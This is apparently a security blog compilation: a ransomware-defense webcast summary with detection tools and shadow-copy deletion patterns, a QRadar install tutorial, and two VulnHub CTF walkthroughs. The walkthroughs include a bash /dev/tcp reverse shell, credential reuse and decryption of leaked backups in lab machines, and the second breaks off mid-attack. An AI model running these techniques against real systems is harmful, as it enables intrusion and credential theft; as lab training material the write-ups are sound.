2021-05-13T00:00:00+00:00

It’s always interesting to read about the devastation that Ransomware brings to organizations around the globe. Recently, on May 7, Colonial Pipeline fell victim to a Ransomware attack orchestrated by the DarkSide group. Check out this ZDNet article and this Security Intelligence post summarizing the incident.

While the investigations (and aftermath) are ongoing, I came across this emergency webcast organized by Black Hills Information Security and presented by John Strand on YouTube.

In this post, I wanted to list the key takeaways (trends, tools, and techniques) from the webcast. They are:

Attack Motivation

Rather than targeting organizations with only IT environments, attackers have understood the value and impact of targeting critical infrastructure with OT environments. The reasoning is simple: more chaos and destruction, which forces organizations to pay the ransom to keep critical infrastructure running and lives safe.

As seen in the Tweets below from Patrick De Haan (@GasBuddyGuy), this is a classic example of chaos - limited resources leading to panic-buying of fuel.

BREAKING: 71% of gas stations in metro Atlanta are without fuel.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 13, 2021

South Florida- you'd be well advised to stop panic buying- you're creating something from nothing.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 13, 2021

NATIONAL AVERAGE REACHES $3/GAL, FIRST TIME IN NEARLY 7 YEARS

The national average price of gasoline has reached $3 per gallon for the first time since October 30, 2014.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 12, 2021

Deception

John says that Deception is no longer a “nice to have”. In fact, Deception is core and essential.

EDR alone is not sufficient protection. We spend too much time and effort securing the endpoint, yet companies are still getting compromised with EDR solutions deployed.

Deception should be more than just Honeypots. We need to look at the attack pathways that attackers take post-exploitation to move laterally and take over an environment. Attackers are using tried-and-tested techniques, the same techniques used by red team and pen-testing professionals.

Put Deception in the right places to detect when something has gone awry.

Techniques

Set bait for attackers. Word documents are great because we can put them on:

Shares
Compromised systems
Websites
Email to spammers

Placed in the right location, the document triggers an alert when an attacker opens it. You can extract multiple valuable fields, such as:

IP address
Machine name
User ID

Bonus: an easy alternative to a DLP solution

What to check out:

jqreator/honeydoc

HoneyDoc creates a “honey” document including things like fake names and social security numbers to look appealing to would-be attackers. It also includes a 1x1 pixel png file called hello.png as the tracking image so that you can see the IPs of who opens the document in your web server logs. To install the image, place it in your web server’s root directory (or any other directory you want to use) and specify your URL using the --url flag when generating the document.

Once the document is generated it can be edited and personalized to make it look any way you want.

Check out HoneyDoc’s GitHub repo for more information about installation and usage.
Canarytokens
You’ll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page’s image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

How Canarytokens work (in 3 short steps):
1. Go to canarytokens.org and select your Canarytoken (supply an email to be notified at as well as a memo that reminds you which Canarytoken this is and where you put it).
2. Place the generated Canarytoken somewhere special (read the examples for ideas on where).
3. If an attacker ever trips on the Canarytoken somehow, you’ll get an email letting you know that it happened.
Check out Canarytokens’ excellent documentation to view examples and more.
Honey Accounts

Honey accounts are useful for detecting attackers who try to fly under the radar of SIEM and UEBA by using a technique such as password spraying. As soon as they attempt to log in to the honey account, a rule is triggered to shut down the machine and alert the SOC/IR team.

The idea is that when someone does breach your network perimeter, one of the first steps in performing recon is collecting information from Active Directory. In this recon, they stumble on a DA account called ‘helpdeskDA’. They even discover a password in the description! Well, this looks like an easy win and a critical finding. In order to figure out how to leverage this newfound user, the attacker attempts to RDP or use psexec to move to a higher value target. In doing so, AD checks the credentials and tells the attacker that his newfound account is not allowed to log in during this time. Meanwhile, this login attempt has triggered an alert and is being investigated.

Check out this post from Jordan Potti for steps and more information.
Kerberoasting Deception

Threat actors can abuse the Kerberos protocol to recover passwords related to service accounts using a tactic called Kerberoasting. In a Windows domain, the authentication protocol Kerberos uses a Ticket Granting Ticket (TGT) to request access tokens from the Ticket Granting Service (TGS) for specific resources/systems joined to the domain.

In Kerberoasting, threat actors abuse valid Kerberos TGTs to make a request for a TGS from any valid Service Principal Name (SPN) within your Microsoft Active Directory domain. These TGSs are vulnerable to offline password cracking, which can allow a threat actor to recover the plaintext password of the associated service account mapped by the SPN.

To detect Kerberoasting while avoiding false positives, you can create a service account honeypot (honeycred): no legitimate user should ever request a ticket for it, so any request is worth investigating.

Check out Blumira’s Guide To Cybersecurity Deception Techniques for more information.

Beacons

What is C&C Beaconing?

Command-and-Control (C&C or C2) beaconing is a type of malicious communication between a C&C server and malware on an infected host. C&C servers can orchestrate a variety of nefarious acts, from denial of service (DoS) attacks to ransomware to data exfiltration.

Often, the infected host will periodically check in with the C&C server on a regular schedule, hence the term beaconing. This pattern can differentiate it from normal traffic because of the regularity of intervals. But beaconing on common ports and protocols (such as HTTP:80 or HTTPS:443) often obscures malicious traffic within normal traffic and helps the attacker evade firewalls. Another evasion tactic, notably used by SUNBURST, involves waiting long, randomized periods of time before communicating.
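To illustrate why regular intervals stand out, the sketch below computes a simple regularity measure: the coefficient of variation (standard deviation divided by mean) of the gaps between a host’s connection times. This is a simplified illustration, not RITA’s actual scoring, and long randomized delays like SUNBURST’s are designed to defeat exactly this kind of check. The function name and sample timestamps are hypothetical.

```python
import statistics


def interval_regularity(timestamps):
    """Coefficient of variation of the gaps between connection timestamps (seconds).

    Values near 0 mean the host checks in on a near-fixed schedule;
    larger values mean irregular, more human-like traffic.
    """
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        raise ValueError("need at least three timestamps")
    mean = statistics.mean(gaps)
    return statistics.pstdev(gaps) / mean if mean else float("inf")


beacon = [0, 60, 120, 180, 240, 300]    # checks in every 60 seconds
browsing = [0, 5, 90, 94, 400, 1300]    # bursty user activity
print(interval_regularity(beacon))      # 0.0
print(round(interval_regularity(browsing), 2))
```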

Check out ExtraHop’s quick primer on C&C Beaconing for more information.

What to check out:

activecm/rita
RITA (Real Intelligence Threat Analytics) is a framework for detecting command and control communication through network traffic analysis.

The framework ingests Zeek logs in TSV format, and currently supports the following major features:
1. Beaconing Detection: Search for signs of beaconing behavior in and out of your network
2. DNS Tunneling Detection: Search for signs of DNS based covert channels
3. Blacklist Checking: Query blacklists to search for suspicious domains and hosts
Check out RITA’s GitHub repo for more information about installation and usage.

Ransomware of the Third Kind

John says that Ransomware has typically fallen into two categories:

Ransomware that encrypts your hard drive
Ransomware that encrypts your files

However, trends reveal a third kind of Ransomware, in which attackers steal files and threaten to release them to the public. This is done for a couple of reasons:

Proof of Life: Attackers want to prove that they really have infiltrated the organization’s network and stolen data
Insurance: Attackers threaten to release all files to the public if the ransom is not paid, compromising confidentiality

Raccine - A Simple Ransomware Vaccine

We see Ransomware delete all shadow copies using vssadmin pretty often. What if we could just intercept that request and kill the invoking process? Let’s try to create a simple vaccine.

Neo23x0/Raccine is a simple yet powerful tool created by Florian Roth which can prevent Ransomware disaster. It works as follows:

We register a debugger for vssadmin.exe (and wmic.exe), which is our compiled raccine.exe. Raccine is a binary that first collects the PIDs of all parent processes and then tries to kill those parent processes.
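Raccine itself is a compiled Windows binary that works on live process information. The Python sketch below only models its first step, walking up the parent chain, so the idea is easy to follow. It assumes a hypothetical snapshot dictionary that maps each PID to its parent PID, and it deliberately leaves out the kill step. A real tool would also need to avoid terminating critical system processes.

```python
from __future__ import annotations


def parent_chain(pid: int, parents: dict[int, int]) -> list[int]:
    """Return the PIDs of all ancestors of `pid`, nearest parent first.

    `parents` is a hypothetical snapshot mapping PID -> parent PID.
    The walk stops at a PID with no known parent, or if it detects a loop
    (possible in stale snapshots because Windows reuses PIDs).
    """
    chain: list[int] = []
    seen = {pid}
    current = parents.get(pid)
    while current is not None and current not in seen:
        chain.append(current)
        seen.add(current)
        current = parents.get(current)
    return chain


# vssadmin.exe (4242) <- malicious.exe (1337) <- cmd.exe (900) <- System (4)
snapshot = {4242: 1337, 1337: 900, 900: 4}
print(parent_chain(4242, snapshot))
```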

What is `vssadmin`?

The Volume Shadow Copy Service administration tool (vssadmin.exe) is a built-in Windows utility that manages volume shadow copies of the files on a given computer. These shadow copies are often used as backups, and they can be used to restore or revert files to a previous state if they are corrupted or lost for some reason. vssadmin is commonly used by backup utilities and systems administrators.

For this reason, the people behind Ransomware campaigns often attempt to delete these shadow copies so that their victims can’t restore file access by reverting to them. Note that interacting with vssadmin should require administrative privileges.

Check out this article from Red Canary explaining more about vssadmin and how to detect malicious usage.
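As a rough illustration of command-line based detection (similar in spirit to Raccine's YARA scanning of command-line parameters, but not its actual rules), the Python sketch below flags process command lines that delete shadow copies. The two patterns, for vssadmin delete shadows and wmic shadowcopy delete, are my own assumptions. They are only a starting point and will miss obfuscated variants.

```python
import re

# Illustrative patterns only; attackers can obfuscate command lines to evade them.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.IGNORECASE),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.IGNORECASE),
]


def is_shadow_copy_deletion(command_line: str) -> bool:
    """Return True if the command line appears to delete volume shadow copies."""
    return any(p.search(command_line) for p in SHADOW_DELETE_PATTERNS)


for cmd in [
    "vssadmin.exe Delete Shadows /All /Quiet",
    r"C:\Windows\System32\wbem\WMIC.exe shadowcopy delete",
    "vssadmin list shadows",
]:
    print(is_shadow_copy_deletion(cmd), cmd)
```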

Advantages:

The method is rather generic

We don’t have to replace a system file (vssadmin.exe or wmic.exe), which could lead to integrity problems and could break our raccination on each patch day

Flexible YARA rule scanning of command line params for malicious activity

The changes are easy to undo

Runs on Windows 7 / Windows 2008 R2 or higher

No running executable or additional service required (agent-less)

Disadvantages:

The legitimate use of vssadmin.exe delete shadows (or any other blacklisted combination) isn’t possible anymore

It even kills the processes that tried to invoke vssadmin.exe delete shadows, which could be a backup process

This won’t catch methods in which the malicious process isn’t one of the processes in the tree that has invoked vssadmin.exe (e.g. via schtasks)

Check out Raccine’s GitHub repo for more information about installation and usage.

Ransomware Protection in Windows

What is Controlled Folder Access?

Controlled folder access helps protect your valuable data from malicious apps and threats, such as Ransomware. Controlled folder access protects your data by checking apps against a list of known, trusted apps. Supported on Windows Server 2019 and Windows 10 version 1709 and later clients, controlled folder access can be turned on using the Windows Security App, Microsoft Endpoint Configuration Manager, or Intune (for managed devices).

With controlled folder access in place, a notification appears on the computer where an app attempted to make changes to a file in a protected folder. You can customize the notification with your company details and contact information. You can also enable the rules individually to customize what techniques the feature monitors.

The protected folders include common system folders (including boot sectors), and you can add more folders. You can also allow specific apps to access the protected folders.

Windows system folders are protected by default, along with several other folders:

c:\Users\\Documents

c:\Users\Public\Documents

c:\Users\\Pictures

c:\Users\Public\Pictures

c:\Users\Public\Videos

c:\Users\\Videos

c:\Users\\Music

c:\Users\Public\Music

c:\Users\\Favorites

You can configure additional folders as protected, but you cannot remove the Windows system folders that are protected by default.

Check out this page on Microsoft docs to learn more about Controlled Folder Access and its features.

IOCs vs Hardening & Generic Rules

John referred to the tweet from Florian below and commented on the over-reliance on IOCs to detect Ransomware.

Instead, organizations should focus on hardening and on generic rules that detect known malicious techniques, because IOCs (file hashes, IP addresses, etc.) can vary between targeted attacks due to customization and obfuscation by the attacker.

The typical approach #Ransomware pic.twitter.com/0RXF1RE4fd
— Florian Roth (@cyb3rops) May 11, 2021
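A tiny Python illustration of why hash-based IOCs are fragile: appending a single byte to a payload produces a completely different SHA-256 hash, so the IOC no longer matches, while a generic rule keyed on the technique still does. The byte strings are made-up placeholders, not real malware, and the "generic rule" is deliberately oversimplified.

```python
import hashlib

original = b"placeholder payload: vssadmin delete shadows /all /quiet"
variant = original + b" "  # the attacker appends one byte (e.g. padding)

# A hash IOC captured from the original sample.
ioc_hashes = {hashlib.sha256(original).hexdigest()}


def matches_hash_ioc(sample: bytes) -> bool:
    return hashlib.sha256(sample).hexdigest() in ioc_hashes


def matches_generic_rule(sample: bytes) -> bool:
    # A (very) simplified technique-based rule: look for the behaviour itself.
    return b"delete shadows" in sample.lower()


print(matches_hash_ioc(original), matches_hash_ioc(variant))          # True False
print(matches_generic_rule(original), matches_generic_rule(variant))  # True True
```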

Install Qradar Ce On Virtualbox

2020-05-30T00:00:00+00:00

In this tutorial, we will learn how to install IBM QRadar Community Edition V7.3.3 on VirtualBox.

Note: IBM has issued a flash notice for QRadar Administrators.

According to IBM: QRadar development has recently identified a defect in the product licensing function, which may cause the deployment to stop functioning. All QRadar versions are affected by this issue.

QRadar CE Administrators must SSH into QRadar as root and run the single-line command for QRadar CE as detailed in the flash notice. After running it, wait 5 minutes for the changes to take effect. Administrators are not required to restart any services for this change as the file loads automatically. Log in to the QRadar Console. Click the Log Activity tab and verify Events are received correctly.

IBM QRadar SIEM is a world-class SIEM tool used by organizations for monitoring and correlating logs from different systems. QRadar can quickly alert SOC Analysts about potential malicious activity and prompt them to take appropriate action.

QRadar Community Edition is a version of QRadar which is great for enthusiasts and learners. According to IBM:

Community Edition is a fully-featured free version of QRadar that is low memory, low EPS, and includes a perpetual license. This version is limited to 50 events per second and 5,000 network flows a minute, supports apps, but is based on a smaller footprint for non-enterprise use.

Pre-requisites

Download the QRadar CE V7.3.3 OVA from the official website

You will need to create an IBM account to complete the download
Download and install VirtualBox from the official website

I am using VirtualBox 6.0 on my MacBook Pro with macOS Mojave
According to IBM, the minimum system requirements are:
8 GB RAM (10 GB is recommended)
250 GB free disk space
2 CPU cores (6 cores is recommended)
At least one network adapter with Internet connection

1. Verify the QRadar CE OVA

Once the QRadar CE V7.3.3 OVA is downloaded, let us start by verifying the integrity of the file. IBM provides a button on the QRadar CE page called SHA256 Sum for OVA. Click on it to open a .txt file with the SHA256 checksum. Use your checksum utility of choice to generate the SHA256 checksum for the downloaded OVA file and compare the two values. I will use the shasum utility (shasum -a 256 followed by the file name) available in the Mac terminal.

As seen in the screenshot above, the integrity of the OVA file has been confirmed.

2. Import QRadar CE OVA into VirtualBox

The next step is to launch VirtualBox.

Click on the Import button and choose the downloaded QRadar CE OVA file. VirtualBox should automatically populate the Appliance settings information. At this stage, we can choose to leave the settings in their default state or make minor changes such as VM name. If required, these settings can be modified later. Click on Import.

As seen in the screenshot above, the memory assigned to the VM is 6144 MB (6 GB). I will pump this up to 8192 MB (8 GB) as recommended by IBM. To achieve this, click on the Settings button and navigate to System > Motherboard > Base Memory. Increase the memory and press OK.

By default, the storage is 250 GB and the number of processors is 2. I will increase the processors to 4 for better performance. To achieve this, click on the Settings button and navigate to System > Processor > Processors and increase the processors to 4. Press OK once completed.

I will leave the networking settings as the default - Bridged mode. Please take care when changing the networking settings as it is important to ensure that the VM has access to the Internet.

3. Launch QRadar CE VM

The next step is to launch the VM by clicking on Start.

The default username is root. Type in root and press Enter.

We are immediately prompted to change the password. Remember to use a strong password.

The next step is to launch the setup script and complete the setup process. Run an ls command to verify that the setup script exists in the directory and run it using the command ./setup

You will be prompted to accept the CentOS 7 Linux EULA. Read and press Enter to accept the license terms.

Press Y to proceed with the installation process.

Let QRadar complete the installation steps. This might take a while; be patient!

After a while, you should see a message saying Press ENTER to complete Installation. Press Enter as directed by the message.

You will be prompted to enter the new admin password. This is the password for the admin user on QRadar CE web user interface. Remember to use a strong password. Note that this is a different account from the previous root user account for the CentOS VM.

The next step is to verify the installation and access the QRadar CE user interface.

4. Verify the QRadar CE Installation

The easiest way to verify if the QRadar CE user interface is up and running is to use the curl command on the CentOS VM.

Run the command: curl https://localhost -k and the output should be as seen in the screenshot below.

Note the -k option in the curl command which skips certificate validation. You can also use --insecure.
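For a scripted version of the same check, here is a Python sketch that uses only the standard library. Like curl -k, it disables certificate and hostname verification, which is acceptable for a lab VM with a self-signed certificate but should not be used against production systems. The IP in the usage comment is this lab's example address.

```python
import ssl
import urllib.request


def insecure_context() -> ssl.SSLContext:
    """Rough equivalent of curl -k: skip certificate and hostname checks."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # must be disabled before relaxing verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def ui_status(url: str, timeout: float = 10.0) -> int:
    """Return the HTTP status code of the QRadar UI landing page."""
    with urllib.request.urlopen(url, context=insecure_context(), timeout=timeout) as resp:
        return resp.status


# Example (lab only): print(ui_status("https://192.168.0.182"))
```

A 200 status suggests the web UI is up; urlopen raises an exception for connection failures and HTTP error codes.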

Now that QRadar CE is working on localhost (CentOS VM), we can try accessing it remotely from the host machine. To achieve this, we need to grab the IP address of the CentOS VM.

Use the ifconfig command to quickly view the IP address.

As seen in the screenshot above, the IP address is 192.168.0.182. I will now attempt to connect to this IP from my host machine (MacBook Pro).

Before attempting access from a web browser, I will repeat the curl command on the Mac terminal: curl https://192.168.0.182 -k. If all goes well, the output should be the same as what we see below and in the previous curl output from the CentOS VM.

Great! Looks like there is proper connectivity. I will fire up Google Chrome and attempt to access QRadar CE.

Chrome will display a Your connection is not private warning. We can ignore this for now and click on Advanced > Proceed to 192.168.0.182 (unsafe)

There you go! Welcome to QRadar CE. Log in with the username admin and the password that was set on the console during the installation step.

You will be greeted with the QRadar Community Edition - License Agreement. Read and click on Accept to continue.

This is the Dashboard view of QRadar CE. However, I noticed that the System Time (displayed on the top-right) is not set to my timezone.

To change the System Time, click on Admin to open the Admin menu.

Next, click on System and License Management.

Select the localhost (console) item and click on the Actions menu item. Under Actions, click on View and Manage System.

Before we change the system time, I would like to mention that this is a critical area of QRadar CE as there are a variety of configuration options. You can view the licensing details such as EPS utilization, configure the firewall to whitelist IP addresses, and configure an email server among many other actions.

Click on System Time and set the desired time and select the correct timezone. Once completed, press Save.

You will be notified that services will be restarted and asked for another confirmation. Press OK.

Once we provide confirmation, a message should appear saying System Time is updated successfully. Services will now restart as seen in the screenshot below. You can close the tab and refresh the QRadar CE home page in a few minutes.

Conclusion & What’s Next

In this tutorial, we installed QRadar CE V7.3.3 on VirtualBox and completed basic configuration of the system time. QRadar CE offers SIEM Administrators, SOC Analysts, and enthusiasts the power to experiment and practice real-world concepts in a test environment.

The next step is to feed some logs into our newly installed QRadar CE. Note that QRadar CE supports only a handful of parsers/DSMs (Device Support Modules) out of the box. The complete list can be viewed in the QRadar CE V7.3.3 Official Documentation. However, more DSMs can be added to support more integrations. Check out this video for more details.

I recommend starting with a basic integration such as Linux OS. This can easily be achieved with a Linux VM (such as CentOS or Ubuntu) using syslog. Check out this video for more details.
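Before setting up syslog forwarding on the Linux VM, it can help to confirm that packets reach QRadar at all. Python's standard logging.handlers.SysLogHandler can send a test event over UDP. In this sketch, the QRadar IP is this lab's example address, port 514/UDP is the conventional syslog port (assumed to be open on the console), and the "qradar-test:" tag is arbitrary. Whether QRadar auto-detects a log source from such a minimal message is not guaranteed, so treat it as a connectivity check only.

```python
import logging
import logging.handlers
import socket


def make_syslog_logger(host: str, port: int = 514) -> logging.Logger:
    """Return a logger that sends each record as a UDP syslog datagram."""
    logger = logging.getLogger(f"qradar-syslog-test:{host}:{port}")
    logger.setLevel(logging.INFO)
    logger.propagate = False  # don't also print to the root logger's handlers
    if not logger.handlers:  # avoid duplicate handlers on repeated calls
        handler = logging.handlers.SysLogHandler(
            address=(host, port), socktype=socket.SOCK_DGRAM
        )
        # SysLogHandler prepends the <PRI> field; we add a simple tag.
        handler.setFormatter(logging.Formatter("qradar-test: %(message)s"))
        logger.addHandler(handler)
    return logger


# Example (lab only):
# make_syslog_logger("192.168.0.182").info("Test event from a Linux VM")
```

After sending, search the Log Activity tab for the tag to see whether the event arrived.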

Here are some other useful resources:

Please reach out if you have any questions or comments.

Vulnhub Escalate My Privileges Walkthrough

2020-04-12T00:00:00+00:00

Escalate My Privileges: 1 is a challenge posted on VulnHub created by Akanksha Sachin Verma. This is a write-up of my experience solving this awesome CTF challenge.

With my Attack Machine (Kali Linux) and Victim Machine (Escalate My Privileges: 1) set up and running, I decided to get down to solving this challenge.

Read more about my set up and environment here

I decided to start my journey by noting down the IP address of our victim machine. We are lucky that the author decided to display it directly on the login screen of the CentOS server.

Great! The victim machine has the IP address 192.168.56.120. Let’s continue with some port scanning (as usual 😏).

I decided to use my trusty nmap with options enabled to scan all ports and provide details about the services running, using the command: nmap -p- -sV 192.168.56.120
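To show what "scan all ports" boils down to, here is a minimal TCP connect scan in Python. It is far less capable than nmap: there is no service or version detection (what -sV adds), and it is much slower. Only run it against machines you are authorized to test; the victim IP in the usage comment is this walkthrough's.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """TCP connect check: True if the three-way handshake completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, ...
        return False


def scan(host: str, ports, workers: int = 100) -> list:
    """Return the sorted list of open TCP ports among `ports`."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: is_open(host, p), ports))
    return sorted(p for p, ok in zip(ports, results) if ok)


# Example (lab only), roughly what -p- covers:
# print(scan("192.168.56.120", range(1, 65536)))
```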

The nmap scan revealed a whole bunch of open ports on the victim machine. The first thing that I noticed was port 80, so I decided to navigate to the website (http://192.168.56.120) using Firefox ESR as follows:

Cool! A pretty index.html webpage which goes well with the theme of the challenge 😎

Whenever I am faced with an HTML page, I make it a point to view the webpage source code before attempting brute-force using tools like dirb or dirbuster. So, I decided to view the webpage source.

Interesting! The alt attribute in the img tag has a URL - http://ip/phpbash.php
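Checking page source for hints like this can also be scripted. The sketch below uses Python's built-in html.parser to collect HTML comments and img alt attributes, two common places for CTF clues. The sample HTML in the usage line is a made-up fragment, not the challenge's actual page.

```python
from html.parser import HTMLParser


class ClueFinder(HTMLParser):
    """Collect HTML comments and img alt attributes, common spots for hints."""

    def __init__(self) -> None:
        super().__init__()
        self.clues = []

    def handle_starttag(self, tag, attrs):
        # Also called for self-closing tags such as <img ... />.
        if tag == "img":
            for name, value in attrs:
                if name == "alt" and value:
                    self.clues.append(("img alt", value))

    def handle_comment(self, data):
        self.clues.append(("comment", data.strip()))


def find_clues(html: str) -> list:
    parser = ClueFinder()
    parser.feed(html)
    parser.close()
    return parser.clues


print(find_clues('<!-- todo --><img src="a.png" alt="http://ip/phpbash.php">'))
```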

I decided to check out http://192.168.56.120/phpbash.php by replacing ip with the victim machine’s IP address.

Oh my God - command execution 😳

I decided to play with some basic Linux commands to learn more about my privileges.

Looks like I am apache.

I decided to check for more users on the victim machine and look for clues. For this purpose, I ran the command: cd /home to navigate to the /home directory where I can find other users (if any).

Bingo! Looks like there is a user called armour on the victim machine. I decided to look inside using the command: ls -lsa armour to also display hidden files (if any).

C’mon it is literally right there - Credentials.txt

What does it contain? I decided to find out…

The Credentials.txt file contains the following text:

my password is
md5(rootroot1)

Woohoo! A password… but how to use it?

Maybe SSH? Our previous nmap scan did show that port 22 was open. Also, the website did not have a login portal or something similar. I decided to try the SSH approach.

But first - I decided to compute the MD5 hash of the password string - rootroot1 using the simple Linux command: echo -n rootroot1 | md5sum

The -n option for the echo command prevents output of the trailing newline
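The same hash can be computed with Python's hashlib. This small sketch also shows why -n matters: hashing the string with a trailing newline, which is what plain echo would pipe into md5sum, gives a different value.

```python
import hashlib


def md5_hex(text: str) -> str:
    """MD5 of the exact bytes of `text`, like `echo -n text | md5sum`."""
    return hashlib.md5(text.encode()).hexdigest()


print(md5_hex("rootroot1"))    # same as: echo -n rootroot1 | md5sum
print(md5_hex("rootroot1\n"))  # same as: echo rootroot1 | md5sum (different!)
```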

Great! We have our password!

I decided to try logging into the victim machine as armour using the command: ssh armour@192.168.56.120

Damn! Not what I had expected!

I decided to go back to the webpage. Maybe I can login to the armour account directly using the su Linux command as follows: su - armour

Read more about su vs sudo here

Hmm, Authentication failure.

I decided to explore a different approach - Reverse Shell. Maybe an interactive shell will allow me to input the MD5 password hash and escalate my privileges from apache to beyond 😎

With my handy Reverse Shell Cheat Sheet by pentestmonkey, I decided to proceed by launching nc -lvp 1010 on my attack machine to listen for connections. Then, on the webpage command execution input, I ran the command:

bash -i >& /dev/tcp/192.168.56.119/1010 0>&1 where 192.168.56.119 is the IP address of the attack machine and port 1010 is the randomly selected port on which nc is listening for connections.

Lo and behold!

Still apache btw!

Now, let’s log in as armour using the command: su - armour

Woohoo! I am armour

It is important to note that once the password is entered, no prompt is displayed. You just need to type in any command and see 😏

Okay, the next step is to escalate my privileges and capture the flag. But how?

I decided to proceed by checking for sudo rights for the user armour. To do this, I ran the command: sudo -l

Bah! Enough is enough! It is time to get a full tty shell.

I ran my usual ever-wonderful Python tty command: python -c 'import pty; pty.spawn("/bin/bash");'

That’s when I decided to check the version of Python. After all, Python can’t betray me 😳

Oh look what we have here!

Python 3.6 - Hurrah!

I decided to try the same Python tty command using python3 this time as follows: python3 -c 'import pty; pty.spawn("/bin/bash");'

Well, there you go! Finally!

Back to checking for a chance to exploit sudo rights using the command: sudo -l

Like a kid in a candy store. Woah!

How about using good ol’ bash?

We did it! We got root! Heck yes!

…Now for the flag 😎

Is that MD5? 😏

My Thoughts

That was a great challenge from Akanksha Sachin Verma! I really enjoyed going back to the basics. Privilege escalation is one of those areas where practice is everything and this challenge seems to be straightforward enough for a beginner (with boatloads of trial-and-error of course 😁)

I am writing a Vulnhub walkthrough after almost 7 months and had to do a LOT of Google-fu and re-read my old material to complete this challenge.

I look forward to solving more challenges in the Escalate My Privileges series.

If you enjoyed reading this write-up, please check out my other Vulnhub walkthroughs.

Vulnhub Dc 7 Walkthrough

2019-09-03T00:00:00+00:00

DC: 7 is a challenge posted on VulnHub created by DCAU. This is a write-up of my experience solving this awesome CTF challenge.

With my Attack Machine (Kali Linux) and Victim Machine (DC: 7) set up and running, I decided to get down to solving this challenge.

Read more about my set up and environment here

I decided to start my journey with netdiscover to complete the host discovery phase as follows: netdiscover -r 192.168.56.0/24

Cool! The victim machine has the IP address 192.168.56.103. Let’s continue with some port scanning!

I decided to use nmap with options enabled to scan all ports and provide details about the service running using the command: nmap -p- -sV 192.168.56.103

The nmap scan revealed that ports 80 and 22 were open. I decided to hit the browser using Firefox ESR. I navigated to the URL http://192.168.56.103 as follows:

Drupal!

…And a message from @DCAU asking us NOT to try the easy way out with brute-force or dictionary attacks. Clearly, there is a bigger picture here. If only we knew how to find it!

I decided to play with the website a little bit. First, I decided to check out the Login page.

Obviously, neither admin/admin nor root/root worked ;)

Analyzing robots.txt wasn’t useful either.

Now, in the back of my mind, I was sure that like WPScan for WordPress and joomscan for Joomla… there must be something similar for Drupal. Some googling revealed droopescan, an open-source scanner for several CMSs, including Drupal, that is available on Kali Linux.

I decided to use droopescan to scan the Drupal website using the following command: droopescan scan -u http://192.168.56.103

Interesting!

The Drupal version appears to be 8.7.x, using the startupgrowth_lite theme. I must admit that I did not know much about Drupal at that time. So, I jumped over to searchsploit to find a way to own this box!

Nothing of significance!

This was when I felt absolutely stuck and decided to ping @DCAU7 (creator of the challenge) on Twitter for a hint. Amazingly, he responded quickly with a tip that got me right back in the game!

The real way to go about this challenge requires an open mind and “outside the box” thinking. @DCAU7 meant this literally. I decided to navigate back to the homepage.

At the footer, there is some text saying @DC7USER

In my initial look, I assumed it was the author’s Twitter handle. Upon closer inspection, something looked fishy. I decided to browse to the URL http://twitter.com/DC7USER

Ka-ching!

Ooh, a GitHub link. I proceeded by following the GitHub URL to https://github.com/Dc7User/

Oh my!

A very real GitHub account with a single repository staffdb. I decided to look inside this mysterious repository.

Interesting! Lots and lots of PHP code files. They must contain something valuable. I decided that searching these PHP files would be easier with a text editor. So, I proceeded by cloning the repository using git clone and opening the folder using Visual Studio Code.

Going through each PHP file one by one, I found that the most interesting file was config.php which contained the following data:

Wow! Credentials!

Username: dc7user
Password: MdR3xOgB7#dW

Where do I use them? Drupal? SSH? I decided to try both.

Drupal Login did not work. Moving on to SSH… please work!

I attempted to gain SSH access to the box using the command: ssh dc7user@192.168.56.103

Woohoo! We got shell as dc7user!

What’s next? Privilege escalation. I was determined to find a way out of dc7user and reach the flag. I decided to go exploring the box.

A quick ls -l revealed a file called mbox and a directory called backups containing 2 GPG encrypted files. As far as I was concerned, these were encrypted because they contained some valuable information. Perhaps, some credentials for the Drupal website?

What’s inside mbox? Maybe some mail? I decided to run a simple cat mbox command to know more.

Well, we got mail. Upon closer inspection, each mail is a notification about the result of a scheduled cron job. One important observation is the Subject field of the mail which tells us the location of the scheduled script as: /opt/scripts/backups.sh

Let’s look inside!

Jackpot! We can clearly see what’s happening here. The script flows as follows:

Delete the contents of the /home/dc7user/backups directory
Use drush (Drupal shell) to create an SQL dump of the Drupal database
Create a compressed copy of all the website files
Encrypt both files using GPG with the passphrase PickYourOwnPassword
Set the user and group owner of the contents of /home/dc7user/backups to dc7user:dc7user
Delete the unencrypted files

Now, I was ecstatic because I knew how to own this box. This technique is well known in the world of CTF: you modify the script, add lines that output the contents of flag.txt to a readable file, and let it run in all its glory as root.

But… there was a problem!

I am dc7user and I cannot modify this file. I need to become www-data for my technique to work. Besides, I knew that @DCAU wouldn’t make it too easy for us.

Moving on, I decided to use the acquired passphrase PickYourOwnPassword and view the contents of the 2 encrypted files inside /home/dc7user/backups. It is crucial to remember what the script does because the contents of this directory are deleted periodically. I decided to create a temporary directory to comfortably solve this challenge using the command: mkdir /tmp/arj

Okay, let’s decrypt!

I decided to start with the SQL database dump, website.sql, using the command: gpg --decrypt website.sql.gpg > /tmp/arj/website.sql

I entered the passphrase as PickYourOwnPassword

It worked!

Great, we have website.sql inside /tmp/arj ready for exploration. As seen above, the size of the decrypted file is 380 MB.

Our goal is to search this file for user credentials for Drupal Login. Ideally, once we gain GUI access, we can launch a reverse shell as www-data and proceed with owning the box.

I decided to take a peek at the SQL dump using the command: head -n 50 website.sql

Knowing the table name would be useful. However, I had no clue about Drupal’s internal naming conventions. I decided to find it the hard way with some good ol’ grep magic using the command: cat website.sql | grep "Table structure for table"

3 tables caught my attention:

users
users_data
users_field_data
